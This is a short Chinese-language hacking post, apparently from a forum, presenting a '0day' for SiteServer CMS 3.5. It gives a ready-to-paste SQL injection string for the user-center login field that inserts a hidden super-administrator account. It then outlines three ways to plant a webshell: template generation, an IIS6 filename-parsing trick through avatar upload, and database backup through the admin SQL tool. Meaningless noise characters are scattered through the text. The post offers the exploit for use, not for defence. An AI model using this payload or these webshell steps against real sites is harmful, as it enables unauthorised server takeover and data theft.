SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

. Y4 _# k* K. @' {; Ustieserver官网:www.siteserver.cn


. Q. q  X3 r+ o
EXP:

直接访问UserCenter/login.aspx
" x9 d7 @7 W& I9 i
- X' D# t5 q. ^# u6 I
  y# W. Y% ^$ |" Q. S0 l
用户名处输入：

123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
" Z6 |6 Z- `* w! y+ T# C

$ v) D; V/ W" \2 \" V# _8 n
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

& B) f6 O8 ]' ~7 I1 \7 W$ i

之后再访问后台SiteServer/login.aspx用插入的用户登陆



后台拿webshell的三种方法：
2 a" {  x6 B& G; [
一、

% e& }2 V/ f% A! Y8 L1 x3 M6 J9 u站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
  `! {! N& ~! }" D
二、
5 _3 l7 ^$ q, K! m
8 A: X, W& o; _+ c5 t) O1 Z+ v' Y8 d, A成员权限-》添加用户-》用户名为：1.asp
/ ]+ K( m) w, W" Q! @
http://127.0.0.1/usercenter/
1 h6 ?- c9 p( I
$ ~. B2 `) p9 y9 `, O用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
  x$ j! p$ k2 i3 S. s
（ps：后台添加用户时不会验证是否含有非法字符）

三、
1 D2 _' V* k: I6 E$ n9 N
系统工具-》实用工具-》机器参数查看
7 i6 L" V" e6 B; C可以看到数据库类型、名称，WEB路径
' m0 @; @% I7 T8 t# X0 S- _) U
系统工具-》数据库工具-》SQL语句查询
8 L# i) h6 j/ C这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
7 Z$ c' B/ E" ]! }